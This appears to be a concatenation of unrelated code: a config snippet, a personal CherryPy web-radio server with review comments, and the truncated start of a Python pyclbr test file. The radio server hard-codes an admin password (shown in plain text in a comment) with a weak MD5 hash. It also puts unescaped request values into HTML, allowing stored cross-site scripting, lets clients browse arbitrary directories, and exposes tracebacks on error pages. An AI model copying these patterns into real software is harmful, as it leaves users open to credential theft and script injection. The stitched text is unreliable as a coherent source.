cfg.setCfgValue("name1", "value1mod2")
cfg.setCfgValue("a_number", 14)
cfg.selectSection("user")
cfg.setCfgValue("acceptable_names", ["john", "janis", "ivan"])
cfg.setCfgValue("list_in_list2", ["[baz]", "[foo, bar]"])
cfg.setCfgValue("list_in_list3", ["first", "[second-one, second-third]"])
cfg.save()

#!/usr/bin/env python3
"""
  My radio server application
  For my eyes only
"""

#CREATE TABLE Radio(id integer primary key autoincrement, radio text, genre text, url text);
# NOTE(review): hard-coded identifier/token checked into source — its use is
# not visible in this chunk; confirm it is not a secret that belongs in
# configuration outside version control.
uuid='56ty66ba-6kld-9opb-ak29-0t7f5d294686'

# Import CherryPy global namespace
import os
import sys
import time
import socket
import cherrypy
import sqlite3 as lite
import re
import subprocess
from random import shuffle

# Globals
version = "4.2.1"        # application version string
database = "database.db"  # SQLite file holding the Radio table (see schema above)
player = 'omxplayer'     # presumably the external playback command — its use is not visible in this chunk

header = '''<!DOCTYPE html>
<html lang="en">
<head>
  <title>My Radio Web Server</title>
  <meta name="generator" content="Vim">
  <meta charset="UTF-8">
  <link rel="icon" type="image/png" href="/static/css/icon.png" />
  <meta name="viewport" content="width=device-width, initial-scale=1">
  <script src="/static/js/jquery-2.0.3.min.js"></script>
  <script src="/static/js/bootstrap.min.js"></script>
  <link rel="stylesheet" href="/static/css/bootstrap.min.css">

<!-- Custom styles for this template -->
<link href="/static/css/sticky-footer.css" rel="stylesheet">
<style media="screen" type="text/css">
#radio-playing { display: none; }
#radio-table  { display: none; }
#radio-volume { display: none; }
.jumbotron { padding: 10px 10px; }
</style>

<script type="text/javascript">
     function fmodradio(rid) {
        $.post('/m/', {id: rid},
            function(data){
                $("#radio-table").html(data);
                $("#radio-table").show();
            },
            "html"
        );
     }
     function fdelradio(rid) {
       var r = confirm("DELETING " + rid);
       if (r != true) { return; }
       $.post('/d/', {id: rid},
            function(data){
                $("#radio-table").html(data);
                $("#radio-table").show();
            },
            "html"
        );
     }
     function fplayradio(rid) {
        $.post('/p/', {id: rid},
            function(data){
                $("#radio-playing").html(data);
                $("#radio-playing").show();
                $("#radio-volume").hide();
            },
            "html"
        );
     }
     function faddfav(i, g) {
       $.post('/haddfav/', {id: i},
            function(data){
                $("#radio-playing").html(data);
                $("#radio-playing").show();
                $("#radio-volume").hide();
            },
            "html"
        );
     }
     function fvolradio(updown) {
        $.post('/v/', {vol: updown},
            function(data){
                $("#radio-volume").html(data);
                $("#radio-volume").show();
            },
            "html"
        );
     }
     function fkilradio() {
        $.post('/k/',
            function(data){
                $("#radio-volume").html(data);
                $("#radio-volume").show();
            },
            "html"
        );
     }
     function fsearch(nam, gen) {
        $.post('/g/', {name: nam, genre: gen},
            function(data) {
                $("#radio-table").html(data);
                $("#radio-table").show();
            },
            "html"
        );
     }
     function frandom(n, g) {
       $.post('/g/', {name: n, genre: g, randomlist:'true'},
            function(data){
                $("#radio-table").html(data);
                $("#radio-table").show();
            },
            "html"
        );
     }

// ----------------------------------------------------------
     $(document).ready(function() {
         $('body').on('click', '#button-modify', function(e) {
             i = $("#idm").val()
             n = $("#namem").val()
             g = $("#genrem").val()
             u = $("#urlm").val()
             $.post("/f/", {id: i, name: n, genre: g, url: u})
              .done(function(data) {
                $("#radio-table").html(data);
                $("#radio-table").show();
            });
            e.preventDefault();
         });
         $('#namem').keyup(function(e){
            if(e.keyCode == 13) {
                $('#button-modify').click();
            }
         });
         $('#genrem').keyup(function(e){
            if(e.keyCode == 13) {
                $('#button-modify').click();
            }
         });
         $('#urlm').keyup(function(e){
            if(e.keyCode == 13) {
                $('#button-modify').click();
            }
         });
         $('#button-search').click(function(e) {
             n = $("#name").val()
             g = $("#genre").val()
             $.post("/g/", {name: n, genre: g})
              .done(function(data) {
                  $("#radio-table").html(data);
                  $("#radio-table").show();
            });
            e.preventDefault();
         });
         $('#name').keyup(function(e){
            if(e.keyCode == 13) {
                $('#button-search').click();
            }
         });
         $('#genre').keyup(function(e){
            if(e.keyCode == 13) {
                $('#button-search').click();
            }
         });
         $("#button-insert").click(function(e) {
             n = $("#namei").val()
             g = $("#genrei").val()
             u = $("#urli").val()
             $.post("/i/", {name: n, genre: g, url: u})
              .done(function(data) {
                  $("#radio-table").html(data);
                  $("#radio-table").show();
            });
            e.preventDefault();
         });
         $("#play-radio").click(function(e) {
             i = $("#idp").val()
             $.post("/p/", {id: i})
              .done(function(data) {
                  $("#radio-playing").html(data);
                  $("#radio-playing").show();
            });
            e.preventDefault();
         });
       });
     </script>
</head>
<body>

<div class="container-fluid">
   <div class='jumbotron'>
      <h2><a href="/">Radio</a>
      <a href="#" onClick="fvolradio('down')"><span class="glyphicon glyphicon-volume-down"></span></a>
      <a href="#" onClick="fvolradio('up')"><span class="glyphicon glyphicon-volume-up"></span></a>
      <a href="#" onClick="fkilradio('up')"> <span class="glyphicon glyphicon-record"></span></a>
      </h2>
      <p>
      <div class="form-group">
        <input type="text" id="name" name="name" placeholder="radio to search">
        <input type="text" id="genre" name="genre" placeholder="genre" >
        <button id="button-search">Search</button>
      </div>
      </p>
      <p>
      <div class="form-group">
      <input type="text" id="namei" name="name" placeholder="Radio Name">
       <input type="text" id="genrei" name="genre" placeholder="genre">
        <input type="text" id="urli" name="url" placeholder="http://radio.com/stream.mp3">
       <button id="button-insert">Insert</button>
       <p>
      [
      <a href="#" onClick="fsearch('', 'rai')"> rai </a>|
      <a href="#" onClick="fsearch('','fav')"> fav </a> |
      <a href="#" onClick="fsearch('','rmc')"> rmc </a> |
      <a href="#" onClick="fsearch('','class')"> class </a> |
      <a href="#" onClick="fsearch('','jazz')"> jazz </a> |
      <a href="#" onClick="fsearch('','chill')"> chill </a> |
      <a href="#" onClick="fsearch('','nl')"> nl </a> |
      <a href="#" onClick="fsearch('','bbc')"> bbc </a> |
      <a href="#" onClick="fsearch('','uk')"> uk </a> |
      <a href="#" onClick="fsearch('','italy')"> italy </a>
      ]
      </p>
      </div>
    <small><div id="radio-playing"> </div></small>
    </br>
   </div> <!-- Jumbotron END -->

 <div id="radio-volume"> </div>
 <div id="radio-table"> </div>
'''

# Closing markup appended after every page body (pairs with `header` above).
footer = '''<p></div></body></html>'''

def isplayfile(pathname):
    """Return True if *pathname* is an existing file with a playable audio
    extension (.mp2, .mp3 or .ogg, case-insensitive)."""
    if not os.path.isfile(pathname):
        return False
    ext = os.path.splitext(pathname)[1].lower()
    return ext in ('.mp2', '.mp3', '.ogg')

# ------------------------ AUTHENTICATION --------------------------------
from cherrypy.lib import auth_basic

#  Password is: webradio
# NOTE(review): credentials and their MD5 hash are hard-coded in the source;
# consider loading them from a config file kept out of version control.
users = {'admin':'29778a9bdb2253dd8650a13b8e685159'}

def validate_password(self, login, password):
    """CherryPy basic-auth callback.

    Accept *login*/*password* when the MD5 of the password matches the
    stored hash; on success, bind the user name and database path to the
    session. Returns True on success, False otherwise.
    """
    if login not in users:
        return False
    if encrypt(password) != users[login]:
        return False
    cherrypy.session['username'] = login
    cherrypy.session['database'] = userdatabase(login)
    return True

def encrypt(pw):
    """Return the hex MD5 digest of password *pw* (str or bytes).

    NOTE(review): MD5 is not a safe password hash; hashlib.pbkdf2_hmac or
    similar would be preferable, but the stored hashes use MD5.
    """
    from hashlib import md5
    # md5() requires bytes on Python 3; on Python 2 `str` already is bytes,
    # so this branch is a no-op there and the change is backward compatible.
    if not isinstance(pw, bytes):
        pw = pw.encode('utf-8')
    return md5(pw).hexdigest()

# ------------------------ CLASS --------------------------------
class Root:
    """CherryPy application object: every exposed method is a page of the
    web-radio UI. Pages return HTML fragments that the client-side JS
    injects into the main page (see the `header` template)."""

    @cherrypy.expose
    def index(self):
        """Front page: offer to replay the last radio remembered in row 0."""
        html = header
        # Row 0 stores the last-played radio: its 'url' column holds that
        # radio's id (see updatelastradio), hence the two-step lookup.
        (_1, _2, id) = getradio('0')
        (radio, genre, url) = getradio(id)

        # NOTE(review): `id` is a string here, so `id != 0` is always true;
        # this probably meant to test for an empty id. Kept as-is.
        if id != 0:
            html += '''<h3><a href="#" onClick="fplayradio('%s')"> ''' % id
            html += '''Play Last Radio %s <span class="glyphicon glyphicon-play"></span></a></h3>''' % radio
        html += getfooter()
        return html

    @cherrypy.expose
    def music(self, directory='/mnt/Media/Music/'):
        """Browse *directory*: playable files get a Play link, subdirectories
        a navigation link back into this page."""
        html = header
        html += '''<table class="table table-condensed">'''
        filelist = os.listdir(directory)
        filelist.sort()
        for f in filelist:
            file = os.path.join(directory, f)
            html += '''<tr>'''
            if isplayfile(file):
                html += '''<td ><a href="#" onClick="fplayradio('%s')">''' % file
                html += '''Play %s<span class="glyphicon glyphicon-play"></span></a></td>''' % (file)
            if os.path.isdir(file):
                html += '''<td ><a href="/music?directory=%s">%s</a> </td>''' % (file, f)
            html += '''</tr>'''

        html += '''</table>'''
        html += '''</div> </div>'''

        html += getfooter()
        return html

    @cherrypy.expose
    def g(self, name="", genre="", randomlist='false'):
        """Search page: list radios matching *name*/*genre*, shuffled when
        *randomlist* is 'true'."""
        # NOTE(review): .decode('utf8') is Python 2 specific; under Python 3
        # `name` is already text and this call would fail.
        rows = searchradio(name.decode('utf8'), genre)

        if randomlist == 'true':
            shuffle(rows)
        count = len(rows)

        listhtml = '''<table class="table table-condensed">'''
        for id, radio, gen, url in rows:
            listhtml += '''<tr>'''
            listhtml += '''<td width="200px"><a href="#" onClick="fmodradio('%s')" alt="%s">%s</a></td>''' % (id, url, radio)
            listhtml += '''<td width="100px">%s</td>''' % gen
            listhtml += '''<td ><a href="#" onClick="fplayradio('%s')">Play <span class="glyphicon glyphicon-play"></span></a></td>''' % (id)
            listhtml += '''</tr>'''
        listhtml += '''</table>'''
        listhtml += '''</div> </div>'''

        html = '''<div class="row"> <div class="col-md-8"> '''
        # Offer the opposite listing mode (random <-> ordered) in the title.
        if randomlist == 'false':
            html += '''<h2><a href="#" onClick="frandom(name='%s', genre='%s', randomlist='true')">%d Results for '%s' + '%s'</a></h2>''' % (name, genre, count, name, genre)
        else:
            html += '''<h2><a href="#" onClick="fsearch(name='%s', genre='%s')">%d Random for '%s' + '%s'</a></h2>''' % (name, genre, count, name, genre)

        html += listhtml

        return html

    @cherrypy.expose
    def i(self, name="", genre="", url=""):
        """Insert a new radio and confirm it with a one-row summary table."""
        html = "<h2>Insert</h2>"
        if not name:
            html += "Error no name"
            return html

        if insert(name, genre, url) == False:
            html += "Error db "
            return html

        html += '''<h3>This radio has been inserted</h3>'''
        html += '''<p><table class="table table-condensed">'''
        html += ''' <tr> '''
        html += '''  <td>radio: <strong>%s</strong></td> ''' % name
        html += '''  <td>genre: <strong>%s</strong></td> ''' % genre
        html += '''  <td>url: <strong><a href="%s" target="_blank">%s</a></strong></td> ''' % (url, url)
        html += '''  <td width="300px"><a href="#" onClick="fplayradio('%s')"> Play ''' % url
        html += '''<span class="glyphicon glyphicon-play"></span></a></td>'''
        html += ''' </tr> '''
        html += '''</table>'''

        return html

    @cherrypy.expose
    def d(self, id=""):
        """Soft-delete radio *id* (marks it non-existent, never removes row 0)."""
        html = "<h2>Delete</h2>"
        if not id:
            html += "Error"
            return html

        if id == "0":
            html += "0 is reserved, sorry"
            return html

        #if delete(id) == False:
        if nonexist(id) == False:
            # Fixed: the original format string had no %s placeholder and
            # raised TypeError here instead of reporting the error.
            html += "Delete error in id %s" % id
            html += getfooter()
            return html

        html += "Item %s set as non existent" % id
        return html

    @cherrypy.expose
    def p(self, id):
        """Start playing radio *id* and return the 'Now Playing' header."""
        html = ""
        if not id:
            html += "Error no radio id"
            return html
        if id == "0":
            html += "0 is reserved, sorry"
            return html

        (radio, genre, url) = playradio(id)
        if url == '':
            html += "Error in parameter %s" % url
            return html

        cherrypy.session['playing'] = id
        html += '''<h3>Now Playing: '''
        html += '''<a href="%s">%s</a>''' % (url, radio)
        html += '''<a href="#" onClick="fplayradio('%s')">''' % id
        html += '''<span class="glyphicon glyphicon-play"></span></a>'''
        html += '''&nbsp;<a href="#" onClick="fmodradio('%s')"><span class="glyphicon glyphicon-pencil"></span></a></small>&nbsp;''' % id
        html += '''<a href="#" onClick="fdelradio('%s')"><span class="glyphicon glyphicon-trash"></span></a>&nbsp;''' % id
        html += '''<a href="#" onClick="faddfav('%s')"><span class="glyphicon glyphicon-star"></span></a>''' % id
        html += '''</h3>'''
        return html

    @cherrypy.expose
    def v(self, vol=""):
        """Change the volume ('up'/'down') and report the new level."""
        html = ""
        if not vol:
            # Fixed: the original fell through and crashed inside volume('').
            html += "Error"
            return html
        v = volume(vol)

        html += "<h6>%s (%s) </h6>" % (v, vol)
        return html

    @cherrypy.expose
    def m(self, id):
        """Show the edit form for radio *id*."""
        html = '''<h2>Modify</h2>'''

        if not id:
            html += "Error"
            return html
        if id == "0":
            html += "0 is reserved, sorry"
            return html

        (name, genre, url) = getradio(id)
        html += '<h3>%s | %s | %s</h3>' % (name, genre, url)
        html += '''<input type="hidden" id="idm" name="id" value="%s">''' % id
        html += '''<input type="text" id="namem" name="name" value="%s">''' % name
        html += '''genre: <input type="text" id="genrem" name="genre" value="%s"> ''' % genre
        html += '''url: <input type="text" style="min-width: 280px" id="urlm" name="url" value="%s"> ''' % url
        html += '''<button id="button-modify">Change</button>'''
        html += '''<h3><a href="#" onClick="fdelradio('%s')">Delete? <span class="glyphicon glyphicon-trash"></span></a></h3>''' % id
        html += '''<h3><a href="%s" target="_blank">Play in browser <span class="glyphicon glyphicon-music"></span></a>''' % url

        return html

    @cherrypy.expose
    def f(self, id="", name="", genre="", url=""):
        """Apply a modification to radio *id* and show the updated row."""
        html = '''<h2>Modified</h2>'''
        if not id:
            html += "Error missing id"
            return html

        if id == "0":
            html += "0 is reserved, sorry"
            return html

        if modify(id, name, url, genre) == False:
            html += "Error in DB"
            return html

        (name, genre, url) = getradio(id)
        html += '''<p><table class="table table-condensed">'''
        html += '''<tr>'''
        html += '''<td width="100px"><a href="#" onClick="fmodradio('%s')">''' % id
        html += '''Mod <span class="glyphicon glyphicon-pencil"></span></a></td>'''
        html += '''<td width="200px">%s</td>''' % name
        html += '''<td width="200px">%s</td>''' % genre
        html += '''<td><a href="%s" target="_blank">%s</a></td>''' % (url, url)
        # NOTE(review): fplayradio is given the url here (the id elsewhere);
        # getradio() resolves both forms, so this is kept as written.
        html += '''<td width="300px"><a href="#" onClick="fplayradio('%s')">''' % url
        html += '''Play <span class="glyphicon glyphicon-play"></span></a></td>'''
        html += '''</tr>'''
        html += '''</table>'''

        return html

    @cherrypy.expose
    def haddfav(self, id=""):
        """Toggle the ', Fav' marker in radio *id*'s genre and redraw the
        'Now Playing' header."""
        # Fixed: `html` was referenced before assignment in the error
        # branches below (UnboundLocalError in the original).
        html = ""
        if not id:
            html += "Error missing id"
            return html

        if id == "0":
            html += "0 is reserved, sorry"
            return html

        (name, genre, url) = getradio(id)
        if 'Fav' in genre:
            genre = genre.replace(', Fav', '')
            star = False
        else:
            genre += ', Fav'
            star = True

        if addgen(id, genre) == False:
            return ''

        (name, genre, url) = getradio(id)
        cherrypy.session['playing'] = id
        html = '<h3>Now Playing: '
        html += '''<a href="%s">%s</a>''' % (url, name)
        html += '''<a href="#" onClick="fplayradio('%s')">''' % url
        html += '''<span class="glyphicon glyphicon-play"></span></a>'''
        html += '''&nbsp;<a href="#" onClick="fmodradio('%s')"><span class="glyphicon glyphicon-pencil"></span></a></small>&nbsp;''' % id
        html += '''<a href="#" onClick="fdelradio('%s')"><span class="glyphicon glyphicon-trash"></span></a>&nbsp;''' % id
        html += '''<a href="#" onClick="faddfav('%s')"><span class="glyphicon glyphicon-star"></span></a>''' % id
        if star:
            html += '''Starred'''
        html += '''</h3>'''

        return html

    @cherrypy.expose
    def k(self):
        """Stop any running player."""
        html = "<h2>Stopping</h2>"
        killall()
        return html

# ------------------------ DATABASE --------------------------------
def getfooter():
    """Build the per-page footer: session info plus version data read from
    DB row 0. Returns the footer HTML followed by the global closing markup."""
    global footer, version

    db = cherrypy.session['database']
    sql = "select radio, genre, url from Radio where id=0"
    con = None
    try:
        con = lite.connect(db)
        cur = con.cursor()
        cur.execute(sql)
        (radio, genre, url) = cur.fetchone()
    except Exception:
        # On any DB error fall back to placeholders (sql shown for debugging).
        (radio, genre, url) = ('ERROR', sql, '')
    finally:
        # The original called con.close() unconditionally and raised
        # NameError when connect() itself had failed.
        if con is not None:
            con.close()

    hostname = socket.gethostname()
    f = '''<footer class="footer"> <div class="container">'''
    f += '''<p class="text-muted">'''
    f += '''Session id: %s - Session Database %s<br>''' % (cherrypy.session.id, cherrypy.session['database'])
    f += '''Host: %s - Version: %s - Updated: %s // Last: %s''' % (hostname, version, genre, url)
    f += '''</p>'''
    f += '''</div></footer>'''
    return f + footer

def updateversiondb(cur):
    """Stamp DB row 0 with the host name and current timestamp.

    Uses the caller's open cursor; the caller is responsible for committing.
    Errors are deliberately swallowed (best-effort bookkeeping).
    """
    # The original referenced an undefined `hostname`, so the UPDATE always
    # failed silently inside the bare except; compute it explicitly.
    hostname = socket.gethostname()
    dt = time.strftime("%Y-%m-%d %H:%M:%S")
    try:
        # Parameterized to avoid quoting problems with the values.
        cur.execute("UPDATE Radio SET radio=?, genre=? WHERE id = 0",
                    (hostname, dt))
    except Exception:
        return

def delete(id):
    """Hard-delete radio *id*. Returns True on success, False on DB error.

    Currently unused: the UI calls nonexist() (soft delete) instead.
    """
    db = cherrypy.session['database']
    try:
        con = lite.connect(db)
    except Exception:
        # Could not open the database at all (original raised NameError
        # on con.close() in this case).
        return False
    cur = con.cursor()
    try:
        # Parameterized: *id* comes from the request, never interpolate it.
        cur.execute("DELETE from Radio WHERE id = ?", (id,))
        ret = True
    except Exception:
        ret = False

    updateversiondb(cur)
    con.commit()
    con.close()
    return ret

def nonexist(id):
    """Soft-delete: mark radio *id* as non-existent (exist = 0).

    Returns True on success, False on any DB error.
    """
    db = cherrypy.session['database']
    try:
        con = lite.connect(db)
    except Exception:
        return False
    cur = con.cursor()
    try:
        # Parameterized: *id* comes from the request, never interpolate it.
        cur.execute("UPDATE Radio set exist = 0 WHERE id = ?", (id,))
        ret = True
    except Exception:
        ret = False

    updateversiondb(cur)
    con.commit()
    con.close()
    return ret

def insert(radio, genre, url):
    """Insert a new radio row (marked as existing).

    Returns True on success, False on any DB error.
    """
    db = cherrypy.session['database']
    try:
        con = lite.connect(db)
    except Exception:
        return False
    cur = con.cursor()
    try:
        # Parameterized: all three values come from the request.
        cur.execute(
            "INSERT INTO Radio (radio, genre, url, exist) VALUES(?, ?, ?, 1)",
            (radio, genre, url))
        ret = True
    except Exception:
        ret = False

    updateversiondb(cur)
    con.commit()
    con.close()
    return ret

def modify(id, radio, url, genre):
    """Update name/url/genre of radio *id* and mark it existing.

    Returns True on success, False on any DB error.
    """
    db = cherrypy.session['database']
    try:
        con = lite.connect(db)
    except Exception:
        return False
    cur = con.cursor()
    try:
        # Parameterized: every value comes from the request.
        cur.execute(
            "UPDATE Radio SET radio=?, url=?, genre=?, exist=1 WHERE id = ?",
            (radio, url, genre, id))
        ret = True
    except Exception:
        ret = False

    updateversiondb(cur)
    con.commit()
    con.close()
    return ret

def addgen(id, genre):
    """Replace the genre of radio *id* (used to toggle the Fav marker).

    Returns True on success, False on any DB error.
    """
    db = cherrypy.session['database']
    try:
        con = lite.connect(db)
    except Exception:
        return False
    cur = con.cursor()
    try:
        # Parameterized: both values come from the request.
        cur.execute("UPDATE Radio SET genre=? WHERE id = ?", (genre, id))
        ret = True
    except Exception:
        ret = False

    updateversiondb(cur)
    con.commit()
    con.close()
    return ret

def getradio(id):
    """Return (radio, genre, url) for *id*, which may be a numeric id or a
    stream url. Returns ('Not Found', '', '') for a missing row or DB error."""
    db = cherrypy.session['database']
    if id.isdigit():
        sql = "select radio, genre, url from Radio where id=?"
    else:
        # The original interpolated the url without quotes, producing a SQL
        # syntax error; parameterizing fixes that and the injection risk.
        sql = "select radio, genre, url from Radio where url=?"
    try:
        con = lite.connect(db)
        cur = con.cursor()
        cur.execute(sql, (id,))
        row = cur.fetchone()
        con.close()
    except Exception:
        # Original fell through and crashed on an unbound cursor here.
        return ('Not Found', '', '')

    if row is None:
        return ('Not Found', '', '')
    return row

def searchradio(radio, genre):
    """Return rows (id, radio, genre, url) of existing radios whose name and
    genre contain the given substrings (id 0 is excluded)."""
    db = cherrypy.session['database']
    sql = ("select id, radio, genre, url from Radio "
           "where exist > 0 and radio like ? and genre like ? and id > 0")
    try:
        con = lite.connect(db)
        cur = con.cursor()
        # Parameterized LIKE: user input is bound, wildcards added here.
        cur.execute(sql, ('%' + radio + '%', '%' + genre + '%'))
    except Exception:
        # Mirror the original debugging aid: one pseudo-row carrying the SQL.
        return [(0, sql, '', genre)]

    rows = cur.fetchall()
    con.close()
    return rows


def updatelastradio(url):
    """Remember the last-played radio by storing its id/url in row 0.

    Best-effort: any DB error is silently ignored.
    """
    db = cherrypy.session['database']
    try:
        con = lite.connect(db)
        cur = con.cursor()
        # Parameterized: *url* originates from the request.
        cur.execute("UPDATE Radio SET url=? WHERE id=0", (url,))
        con.commit()
        con.close()
    except Exception:
        return

def userdatabase(user):
    """Return the path of the (shared) database file for *user*, or None
    if the file does not exist. *user* is currently unused."""
    path = database
    return path if os.path.isfile(path) else None

def getshort(code, maxl=5):
    """Return *code* with any 'http://' removed, truncated to *maxl* chars.

    :param code: url or label to shorten
    :param maxl: maximum length of the result (default 5, as before)
    """
    newcode = code.replace('http://', '')
    # Slicing already handles strings shorter than maxl.
    return str(newcode[:maxl])

def setplayer(p):
    """Select the audio player backend ('mpg123', 'mplayer' or 'omxplayer')."""
    global player
    player = p

def playradio(urlid):
    """Stop any current playback and start playing radio *urlid* (an id or
    url resolved by getradio) with the configured player.

    Returns (radio, genre, urlid).
    """
    global player

    (radio, genre, url) = getradio(urlid)

    killall()
    # List-form Popen (no shell): the url came from the database / request,
    # so shell=True with string interpolation was a command-injection hole.
    if player == 'mpg123':
        subprocess.Popen(['/usr/bin/mpg123', '-q', url])
    elif player == 'mplayer':
        subprocess.Popen(['/usr/bin/mplayer', '-really-quiet', url])
    elif player == 'omxplayer':
        # Process stays in background.
        subprocess.Popen(['omxplayer', url])

    updatelastradio(urlid)
    return (radio, genre, urlid)

def killall():
    """Stop any running player process; returns the pkill exit status."""
    global player
    # omxplayer needs an explicit stop through its control helper first.
    if player == 'omxplayer':
        subprocess.call(["/usr/local/bin/omxcontrol", "stop"])
    return subprocess.call(["pkill", player])

def volume(vol):
    """Dispatch a volume change ('up'/'down') to the active player backend."""
    global player
    return volume_omxplayer(vol) if player == 'omxplayer' else volume_alsa(vol)

def volume_alsa(vol):
    """Adjust the ALSA 'Power Amplifier' mixer by 5% ('up' or 'down') and
    return the trailing part of amixer's report (the level)."""
    # With ALSA on CHIP
    if vol == 'up':
        out = subprocess.check_output(["amixer set 'Power Amplifier' 5%+"], shell=True)
    elif vol == 'down':
        out = subprocess.check_output(["amixer set 'Power Amplifier' 5%-"], shell=True)
    else:
        # Original raised NameError on an unknown direction; report nothing.
        return ''
    i = out.rfind(':')
    return out[i+1:]

def volume_omxplayer(vol):
    """Adjust omxplayer's volume via omxcontrol and return the new level
    formatted in decibels."""
    import math
    control = "/usr/local/bin/omxcontrol"
    action = "volumeup" if vol == 'up' else "volumedown"
    subprocess.check_output([control, action])

    # Query the resulting linear volume and convert it to dB.
    v = subprocess.check_output([control, "volume"])
    level = float(v[v.rfind(':') + 1:])
    return "%-2.2f dB" % (10.0 * math.log(level, 10))

# ------------------------ SYSTEM --------------------------------
def writemypid(pidfile):
    """Write the current process id to *pidfile* (for init scripts).

    The original ended with a bare `f.close` (missing parentheses, a no-op);
    the `with` block already closes the file.
    """
    with open(pidfile, 'w') as f:
        f.write(str(os.getpid()))

# Cherrypy Management
def error_page_404(status, message, traceback, version):
    """Render the custom 404 page (CherryPy error-page handler).

    Shows the status and traceback between the app's header and footer.
    """
    parts = [header,
             "%s<br>" % (status,),
             "%s" % (traceback,),
             getfooter()]
    return "".join(parts)

def error_page_401(status, message, traceback, version):
    """Render the custom 401 (unauthorized) page (CherryPy error-page handler).

    *traceback* and *version* are supplied by CherryPy but not displayed.
    """
    head = '''<!DOCTYPE html>
<html lang="en">
<head>
  <title>My Radio Web Server</title>
  <meta name="generator" content="Vim">
  <meta charset="UTF-8">
</head>
<body>
   '''
    return head + ("<h1>%s</h1>" % (status,)) + ("%s<br>" % (message,))

# Secure headers!
def secureheaders():
    """Attach security headers to every response (CherryPy tool hook)."""
    hdrs = cherrypy.response.headers
    hdrs['X-Frame-Options'] = 'DENY'
    hdrs['X-XSS-Protection'] = '1; mode=block'
    hdrs['Content-Security-Policy'] = "default-src='self'"

if __name__ == '__main__':

    import argparse

    # Command-line configuration for the radio server.
    parser = argparse.ArgumentParser()
    parser.add_argument('--player', action="store", dest="player", default="mplayer")
    parser.add_argument('--stage', action="store", dest="stage", default="production")
    parser.add_argument('--database', action="store", dest="database",  default="database.db")
    parser.add_argument('--root', action="store", dest="root", default=".")
    parser.add_argument('--pid', action="store", dest="pid", default="/tmp/8804.pid")
    parser.add_argument('--port', action="store", dest="port", type=int, default=8804)

    # get args
    args = parser.parse_args()

    # Where to start, what to get
    root = os.path.abspath(args.root)
    database = os.path.join(root, args.database)
    os.chdir(root)
    current_dir = os.path.dirname(os.path.abspath(__file__))
    setplayer(args.player)

    # Record our PID so an init script can stop/restart the server.
    writemypid(args.pid)

    # Listen on all interfaces on the configured port.
    settings = {'global': {'server.socket_host': "0.0.0.0",
                           'server.socket_port' : args.port,
                           'log.screen': True,
                          },
               }

    # Static assets under /static; HTTP basic auth + sessions everywhere else.
    conf = {'/static': {'tools.staticdir.on': True,
                     'tools.staticdir.root': current_dir,
                     'tools.staticfile.filename': 'icon.png',
                     'tools.staticdir.dir': 'static'
                    },
            '/':    {
                     'tools.auth_basic.on': True,
                     'tools.auth_basic.realm': 'localhost',
                     'tools.auth_basic.checkpassword': validate_password,
                     'tools.secureheaders.on' : True,
                     'tools.sessions.on': True,
                    },
           }

    cherrypy.config.update(settings)
    cherrypy.config.update({'error_page.404': error_page_404})
    cherrypy.config.update({'error_page.401': error_page_401})
    cherrypy.tools.secureheaders = cherrypy.Tool('before_finalize', secureheaders, priority=60)

    # To make it ZERO CPU usage
    #cherrypy.engine.timeout_monitor.unsubscribe()
    #cherrypy.engine.autoreload.unsubscribe()

    # Cherry insert pages
    serverroot = Root()

    # Start the CherryPy server.
    cherrypy.quickstart(serverroot, config=conf)


'''
   Test cases for pyclbr.py
   Nick Mathewson
'''
from test.test_support import run_unittest, import_module
import sys
from types import ClassType, FunctionType, MethodType, BuiltinFunctionType
import pyclbr
from unittest import TestCase

StaticMethodType = type(staticmethod(lambda: None))
ClassMethodType = type(classmethod(lambda c: None))

# Silence Py3k warning
import_module('commands', deprecated=True)

# This next line triggers an error on old versions of pyclbr.
from commands import getstatus

# Here we test the python class browser code.
#
# The main function in this suite, 'testModule', compares the output
# of pyclbr with the introspected members of a module.  Because pyclbr
# is imperfect (as designed), testModule is called with a set of
# members to ignore.

class PyclbrTest(TestCase):
    """Compare pyclbr's static analysis of a module with the real, imported
    module object, ignoring a caller-supplied set of names (Python 2 code)."""

    def assertListEq(self, l1, l2, ignore):
        ''' succeed iff {l1} - {ignore} == {l2} - {ignore} '''
        # Symmetric difference: names present in exactly one of the lists.
        missing = (set(l1) ^ set(l2)) - set(ignore)
        if missing:
            print >>sys.stderr, "l1=%r\nl2=%r\nignore=%r" % (l1, l2, ignore)
            self.fail("%r missing" % missing.pop())

    def assertHasattr(self, obj, attr, ignore):
        ''' succeed iff hasattr(obj,attr) or attr in ignore. '''
        if attr in ignore: return
        if not hasattr(obj, attr): print "???", attr
        self.failUnless(hasattr(obj, attr),
                        'expected hasattr(%r, %r)' % (obj, attr))


    def assertHaskey(self, obj, key, ignore):
        ''' succeed iff key in obj or key in ignore. '''
        if key in ignore: return
        if key not in obj:
            print >>sys.stderr, "***", key
        self.assertTrue(key in obj)

    def assertEqualsOrIgnored(self, a, b, ignore):
        ''' succeed iff a == b or a in ignore or b in ignore '''
        if a not in ignore and b not in ignore:
            self.assertEqual(a, b)

    def checkModule(self, moduleName, module=None, ignore=()):
        ''' succeed iff pyclbr.readmodule_ex(modulename) corresponds
            to the actual module object, module.  Any identifiers in
            ignore are ignored.   If no module is provided, the appropriate
            module is loaded with __import__.'''

        if module is None:
            # Import it.
            # ('<silly>' is to work around an API silliness in __import__)
            module = __import__(moduleName, globals(), {}, ['<silly>'])

        dict = pyclbr.readmodule_ex(moduleName)

        # True iff *obj* (attribute *name* of *oclass*) is something pyclbr
        # would report as a method; handles staticmethod/classmethod and
        # private-name mangling.
        def ismethod(oclass, obj, name):
            classdict = oclass.__dict__
            if isinstance(obj, FunctionType):
                if not isinstance(classdict[name], StaticMethodType):
                    return False
            else:
                if not  isinstance(obj, MethodType):
                    return False
                if obj.im_self is not None:
                    if (not isinstance(classdict[name], ClassMethodType) or
                        obj.im_self is not oclass):
                        return False
                else:
                    if not isinstance(classdict[name], FunctionType):
                        return False

            objname = obj.__name__
            if objname.startswith("__") and not objname.endswith("__"):
                # Undo Python's private-name mangling before comparing.
                objname = "_%s%s" % (obj.im_class.__name__, objname)
            return objname == name

        # Make sure the toplevel functions and classes are the same.
        for name, value in dict.items():
            if name in ignore:
                continue
            self.assertHasattr(module, name, ignore)
            py_item = getattr(module, name)
            if isinstance(value, pyclbr.Function):
                self.assert_(isinstance(py_item, (FunctionType, BuiltinFunctionType)))
                if py_item.__module__ != moduleName:
                    continue   # skip functions that came from somewhere else
                self.assertEquals(py_item.__module__, value.module)
            else:
                self.failUnless(isinstance(py_item, (ClassType, type)))
                if py_item.__module__ != moduleName:
                    continue   # skip classes that came from somewhere else

